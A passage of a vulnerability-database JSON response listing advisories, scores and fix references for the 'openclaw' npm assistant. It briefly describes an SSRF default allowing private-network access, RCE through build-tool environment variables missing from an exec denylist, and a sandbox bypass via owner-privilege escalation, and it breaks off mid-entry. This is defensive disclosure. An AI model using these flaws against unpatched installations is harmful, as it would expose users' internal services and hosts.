"vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35624", "GHSA-xhq5-45pm-2gjr" ], "risk_score": 1.9, "exploitability": "0.5", "weighted_severity": "3.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3xeb-phgc-vkcg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89051?format=api", "vulnerability_id": "VCID-3xmj-n798-x3cw", "summary": "OpenClaw: Browser SSRF policy default allowed private-network navigation\n## Summary\n\nBrowser SSRF policy default allowed private-network navigation.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nBrowser SSRF protection could allow private-network navigation by default in paths where restrictive behavior was expected, exposing internal services or metadata endpoints through browser-driven requests.\n\n## Technical Details\n\nThe fix preserves strict SSRF configuration semantics, keeps private-network access disabled unless explicitly opted in, and updates loopback CDP readiness handling for the stricter default.\n\n## Fix\n\nThe issue was fixed in #66354 and #66386. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `024f4614a1a1831406e763adc40ef226e3d5e9ed`\n- `1dabfef28db523e7de81edeb3dd689e9171236a2`\n- `213c36cf51121ef6c05cfccd78037371f968f31a`\n- `7eecfa411df3d12e6b810e6ca5df47254fc3db3f`\n- PR: #66354, #66386\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43527", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10565", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.1227", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.12235", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43527" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/024f4614a1a1831406e763adc40ef226e3d5e9ed", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/024f4614a1a1831406e763adc40ef226e3d5e9ed" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/1dabfef28db523e7de81edeb3dd689e9171236a2", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/1dabfef28db523e7de81edeb3dd689e9171236a2" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/213c36cf51121ef6c05cfccd78037371f968f31a", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/213c36cf51121ef6c05cfccd78037371f968f31a" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7eecfa411df3d12e6b810e6ca5df47254fc3db3f", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/7eecfa411df3d12e6b810e6ca5df47254fc3db3f" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/66354", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/66354" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/66386", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/66386" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-53vx-pmqw-863c", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-53vx-pmqw-863c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43527", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43527" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-private-network-navigation", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-private-network-navigation" }, { "reference_url": "https://github.com/advisories/GHSA-53vx-pmqw-863c", "reference_id": "GHSA-53vx-pmqw-863c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-53vx-pmqw-863c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109967?format=api", "purl": "pkg:npm/openclaw@2026.4.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14" } ], "aliases": [ "CVE-2026-43527", "GHSA-53vx-pmqw-863c" ], "risk_score": 3.5, "exploitability": "0.5", "weighted_severity": "6.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3xmj-n798-x3cw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89496?format=api", "vulnerability_id": "VCID-3zwq-dz2u-pqgv", "summary": "OpenClaw: HGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class)\n## Impact\n\nHGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class).\n\nMissing denylist entries allowed hostile build-tool environment variables to influence host exec commands.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.8`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\nThanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42427", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11001", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10959", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.10993", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42427" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7437-7hg8-frrw", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7437-7hg8-frrw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42427", "reference_id": "CVE-2026-42427", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42427" }, { "reference_url": "https://github.com/advisories/GHSA-7437-7hg8-frrw", "reference_id": "GHSA-7437-7hg8-frrw", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7437-7hg8-frrw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42427", "GHSA-7437-7hg8-frrw" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3zwq-dz2u-pqgv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90172?format=api", "vulnerability_id": "VCID-3zx4-t8cj-kbfn", "summary": "OpenClaw: Heartbeat context inheritance bypasses sandbox via senderIsOwner escalation\n## Summary\nHeartbeat context inheritance bypasses sandbox via senderIsOwner escalation\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: Critical\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm 